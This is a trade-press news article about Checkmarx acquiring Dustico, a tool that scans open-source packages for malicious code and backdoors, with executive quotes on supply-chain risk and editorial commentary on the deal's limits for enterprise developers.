Checkmarx has acquired SaaS code checking tool Dustico as it warns of stranger danger in open-source software. Dustico checks for malicious attacks and backdoors in open-source supply chains. Checkmarx is to integrate Dustico’s behavioural analysis technology with its existing application software testing (AST) tools.
Maty Siman, CTO, Checkmarx, said: “Today’s adversaries have zoned-in on software supply chains – many of which rely heavily on open source. As the threat of tampering in third-party packages increases, development teams must operate with the proactive assumption that all code may have been maliciously manipulated.
“With Dustico, we’re building on our mission to secure open source by enabling customers to perform vulnerability, behavioral, and reputational analysis from a single solution. This will give developers and security leaders the insights and confidence needed to choose safer code packages, and in turn, build more secure applications at speed.”
As open-source becomes more widely used, it creates more opportunities for malicious actors. Malicious libraries integrated with trusted open-source tools are not uncommon. Many can be detected using existing software testing tools, but not all. Checkmarx wants to raise the testing bar to detect those libraries that are missed by existing tools.
According to Robert Haynes, SCA and open-source evangelist at Checkmarx, this is all about establishing risk. In a blog, he writes: “Evaluating what a piece of software does, what processes it creates, what ports it opens, and what connections it attempts to make are all critical indicators of the package’s intent.
“Looking at who contributed to the code, what other packages they have created, and their overall online presence can give us indicators and evidence of the potential intent of their coding activities. While this information might not be definitive, it’s definitely a useful component in building a risk model.”
The challenge for organisations, according to Haynes, is the sheer volume of open-source used by enterprise developers. It makes it hard for them to detect risk on a consistent basis. Even more complex is building their own reputation solution to decide which contributors can be trusted.
Checkmarx lists three reasons for acquiring Dustico:
- Powered by highly advanced machine learning models, Dustico automatically detects abnormal behaviours in code packages and checks IOCs against multiple threat intelligence feeds to provide accurate and advanced detection of attackers’ activity (TTPs).
- Dustico’s technology is engineered to fetch packages for analysis as soon as they are published online, giving development teams a faster and more streamlined user experience.
- With Dustico being natively integrated into the Checkmarx platform, developers will benefit from a frictionless user experience via direct integrations into their CI and build systems.
Enterprise Times: What does this mean?
Acquisitions are the name of the game in the security industry at the moment. Small companies with new approaches to problems keep popping up. Some have good tech, and many quickly build a customer base. For some security vendors, acquisitions are as much about those customers as they are the tech.
In this case, Checkmarx appears to be much more focused on the tech and what it adds to its existing solutions. That is good news for its customers, and in acquiring Dustico, it throws light into the dark corners of open-source. What is particularly relevant here is that this is as much about risk as detecting bad code. The ability to detect and assess new packages as they are released will also appeal. It reduces the risk of something ending up inside the enterprise before it has been reviewed.
However, there is a major caveat here. This is aimed at enterprise developers who already track the open-source packages they use. That is not the case in all organisations. There is a lot of casual use of open-source across enterprises. For this to be effective, it will need changes to processes inside those developer teams.
It also needs those same organisations to widen its use to code and tools used by their citizen developers. Code is no longer the sole province of professional developers. Tools like this need to be accessible to all if they are to be effective.